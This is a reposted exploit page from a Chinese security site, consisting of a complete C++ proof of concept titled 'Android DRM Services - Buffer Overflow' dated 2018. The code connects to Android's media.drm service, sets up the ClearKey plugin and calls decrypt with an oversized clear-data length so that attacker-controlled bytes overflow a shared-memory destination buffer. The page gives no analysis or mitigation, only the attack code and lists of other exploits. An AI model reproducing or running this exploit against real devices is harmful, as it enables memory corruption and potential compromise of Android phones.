首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Android DRM Services - Buffer Overflow
来源:vfocus.net 作者:Tamir 发布时间:2018-03-19  
#include <utils/StrongPointer.h>
#include <binder/IServiceManager.h>
#include <binder/MemoryHeapBase.h>
#include <binder/MemoryBase.h>
#include <binder/IMemory.h>
#include <media/ICrypto.h>
#include <media/IMediaDrmService.h>
#include <media/hardware/CryptoAPI.h>
 
#include <stdio.h>
#include <unistd.h>
 
using namespace android;
 
static sp<ICrypto> getCrypto()
{
    sp<IServiceManager> sm = defaultServiceManager();
    sp<IBinder> binder = sm->getService(String16("media.drm"));
    sp<IMediaDrmService> service = interface_cast<IMediaDrmService>(binder);
    if (service == NULL) {
        fprintf(stderr, "Failed to retrieve 'media.drm' service.\n");
        return NULL;
    }
    sp<ICrypto> crypto = service->makeCrypto();
    if (crypto == NULL) {
        fprintf(stderr, "makeCrypto failed.\n");
        return NULL;
    }
    return crypto;
}
 
static bool setClearKey(sp<ICrypto> crypto)
{
    // A UUID which identifies the ClearKey DRM scheme.
    const uint8_t clearkey_uuid[16] = {
        0x10, 0x77, 0xEF, 0xEC, 0xC0, 0xB2, 0x4D, 0x02,
        0xAC, 0xE3, 0x3C, 0x1E, 0x52, 0xE2, 0xFB, 0x4B
    };
    if (crypto->createPlugin(clearkey_uuid, NULL, 0) != OK) {
        fprintf(stderr, "createPlugin failed.\n");
        return false;
    }
    return true;
}
 
#define DATA_SIZE (0x2000)
#define DEST_OFFSET (1)
 
static void executeOverflow()
{
    // Get an interface to a remote CryptoHal object.
    sp<ICrypto> crypto = getCrypto();
    if (crypto == NULL) {
        return;
    }
 
    if (!setClearKey(crypto)) {
        return;
    }
 
    // From here we're done with the preparations and go into the
    // vulnerability PoC.
 
    sp<MemoryHeapBase> heap = new MemoryHeapBase(DATA_SIZE);
    // This line is to merely show that we have full control over the data
    // written in the overflow.
    memset(heap->getBase(), 'A', DATA_SIZE);
    sp<MemoryBase> sourceMemory = new MemoryBase(heap, 0, DATA_SIZE);
    sp<MemoryBase> destMemory = new MemoryBase(heap, DATA_SIZE - DEST_OFFSET,
        DEST_OFFSET);
    int heapSeqNum = crypto->setHeap(heap);
    if (heapSeqNum < 0) {
        fprintf(stderr, "setHeap failed.\n");
        return;
    }
 
    CryptoPlugin::Pattern pattern = { .mEncryptBlocks = 0, .mSkipBlocks = 1 };
    ICrypto::SourceBuffer source = { .mSharedMemory = sourceMemory,
        .mHeapSeqNum = heapSeqNum };
    // mNumBytesOfClearData is the actual size of data to be copied.
    CryptoPlugin::SubSample subSamples[] = { {
        .mNumBytesOfClearData = DATA_SIZE, .mNumBytesOfEncryptedData = 0 } };
    ICrypto::DestinationBuffer destination = {
        .mType = ICrypto::kDestinationTypeSharedMemory, .mHandle = NULL,
        .mSharedMemory = destMemory };
 
    printf("decrypt result = %zd\n", crypto->decrypt(NULL, NULL,
        CryptoPlugin::kMode_Unencrypted, pattern, source, 0, subSamples,
        ARRAY_SIZE(subSamples), destination, NULL));
}
 
int main() {
    executeOverflow();
    return 0;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·MikroTik RouterOS < 6.41.3/6.4
·SAP NetWeaver AS JAVA CRM - Lo
·Spring Data REST < 2.6.9 (Inga
·MikroTik RouterOS < 6.38.4 (MI
·MikroTik RouterOS < 6.38.4 (x8
·ACL Analytics 13.0.0.579 Arbit
·SC 7.16 - Stack-Based Buffer O
·Advantech WebAccess < 8.3 - Di
·DEWESoft X3 SP1 (64-bit) - Rem
·ManageEngine Applications Mana
·Sony Playstation 4 (PS4) 4.55
·Memcached 1.5.5 - 'Memcrashed
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved